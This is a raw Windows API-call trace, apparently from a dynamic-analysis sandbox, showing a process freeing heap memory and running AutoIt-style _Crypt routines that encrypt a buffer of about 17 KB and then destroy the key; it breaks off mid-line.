[0171.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0171.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0171.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0171.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0171.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0171.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0171.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0171.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0171.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0171.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0171.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0171.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0171.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0171.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0171.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0171.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0171.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0171.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0171.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0171.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0171.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0171.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0171.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0171.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0171.779] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0171.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0171.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0171.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0171.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0171.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0171.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0171.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0171.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0171.779] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c2888, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2888*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0171.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0171.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0171.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0171.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0171.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0171.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0171.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0171.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0171.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0171.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0171.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0171.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0171.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0171.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0171.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0171.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0171.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0171.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0171.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0171.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0171.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0171.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0171.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0171.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0171.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0171.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0171.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0171.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0171.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0171.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0171.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0171.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0171.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0171.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0171.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0171.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0171.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0171.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0171.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0171.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0171.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0171.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0171.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0171.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0171.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0171.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0171.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0171.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0171.781] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0171.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0171.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0171.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0171.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0171.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0171.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0171.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0171.782] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0171.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0171.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0171.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0171.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0171.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0171.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0171.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0171.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0171.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0171.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0171.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0171.782] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.782] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.782] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.782] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.782] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.782] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.782] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0171.783] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.783] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0171.783] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0171.783] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.783] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.783] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0171.783] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0171.783] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0171.783] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.783] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.783] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.783] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.783] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.783] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.783] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0171.784] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.784] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x4587, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x4590) returned 1 [0171.784] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.784] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.784] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.784] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.784] CharLowerBuffW (in: lpsz="byte[17809]", cchLength=0xb | out: lpsz="byte[17809]") returned 0xb [0171.784] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.784] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.785] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.785] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0171.785] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.785] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9edcb0*, pdwDataLen=0x87e820*=0x4587, dwBufLen=0x4590 | out: pbData=0x9edcb0*, pdwDataLen=0x87e820*=0x4590) returned 1 [0171.785] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.785] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.785] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.785] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.785] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.785] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.785] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0171.786] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.786] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0171.786] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0171.786] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0171.786] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.786] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0171.786] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0171.786] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.786] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0171.786] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.789] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.789] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.789] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.794] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.794] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.794] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0171.794] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0171.794] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.794] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0171.794] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.794] CryptDestroyKey (hKey=0x90aed8) returned 1 [0171.795] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0171.795] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0171.795] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0171.795] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0171.795] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0171.795] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0171.795] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0171.795] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0171.795] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0171.795] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0171.795] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0171.795] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0171.795] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0171.795] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0171.795] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.796] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0171.796] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.796] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0171.796] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, 